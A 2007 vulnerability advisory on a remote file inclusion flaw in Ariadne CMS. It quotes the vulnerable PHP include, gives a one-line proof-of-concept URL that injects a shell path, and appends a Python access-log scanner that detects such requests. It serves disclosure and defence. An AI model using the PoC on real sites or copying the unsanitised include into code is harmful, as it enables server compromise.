Ariadne CMS Remote File Inclusion

AdvisoryAria-security.net
Date: Mon Aug 06 2007 - 16:41:32 CDT


_________________________

A R I A - S E C U R I T Y
_________________________

Ariadne CMS Remote File Inclusion
Vendor: http://www.ariadne-cms.org/

Source Code:

<?php
  require("./ariadne.inc");
  // Include path is built from $ariadne; the PoC below supplies it as a request parameter.
  require($ariadne."/configs/ariadne.phtml");

  $PATH_INFO = $HTTP_SERVER_VARS["PATH_INFO"];
?>
<html>
<head>
  <script>
    function LoadingDone() {
      parent.LoadingDone();
    }

PoC:
http://site.com/path/view.php?ariadne=SHELL?

Credits: Aria-Security Team
http://Aria-Security.net
http://outlaw.aria-security.info
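
A log check a defender could run for the request pattern in the PoC above, added here as an example and not part of the original advisory or of Ariadne's code: it flags access-log requests whose query string sets "ariadne" on a PHP script. The log lines, addresses and the example.invalid host are constructed, and it assumes legitimate clients never send this parameter, since the excerpt uses $ariadne as a server-side base path.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request portion of a Common/Combined Log Format line.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
# PHP script, optionally followed by PATH_INFO (the excerpt reads PATH_INFO).
PHP_PATH_RE = re.compile(r'\.php(?:/|$)', re.I)
# Value starts with a URL scheme / stream wrapper (http:, ftp:, php:, data:) or "//".
REMOTE_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.\-]+:|//)', re.I)
PARAM = "ariadne"  # variable name from the advisory's PoC (PHP names are case-sensitive)

# Constructed sample lines; addresses and hosts are documentation-only values.
SAMPLE_LOG = [
    '192.0.2.10 - - [06/Aug/2007:16:40:01 -0500] "GET /path/view.php/docs/ HTTP/1.1" 200 5120',
    '198.51.100.7 - - [06/Aug/2007:16:41:32 -0500] "GET /path/view.php?ariadne=http://example.invalid/x.txt? HTTP/1.1" 200 312',
    '198.51.100.7 - - [06/Aug/2007:16:41:40 -0500] "GET /path/view.php/x?ariadne=http%3A%2F%2Fexample.invalid%2Fx.txt HTTP/1.1" 200 298',
    '203.0.113.5 - - [06/Aug/2007:16:42:02 -0500] "GET /path/view.php?ariadne=/tmp/ HTTP/1.1" 500 0',
    '203.0.113.5 - - [06/Aug/2007:16:42:09 -0500] "GET /index.html?ariadne=http://example.invalid/ HTTP/1.1" 404 210',
]


def classify(line):
    """Return None for unrelated lines, else a dict describing the suspicious request."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if not PHP_PATH_RE.search(parts.path):
        return None
    # parse_qsl percent-decodes once, which mirrors what PHP does to the query string.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name == PARAM:
            kind = "remote-include" if REMOTE_RE.match(value) else "param-override"
            return {"ip": m.group("ip"), "path": parts.path, "kind": kind,
                    "status": int(m.group("status")), "value": value}
    return None


def scan(lines):
    """Collect every hit. Query strings only: POST bodies and cookies are not in access logs."""
    return [hit for hit in map(classify, lines) if hit]


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A "param-override" hit still deserves review: the value is a local path rather than a URL, but the client is setting a variable that should only come from server configuration.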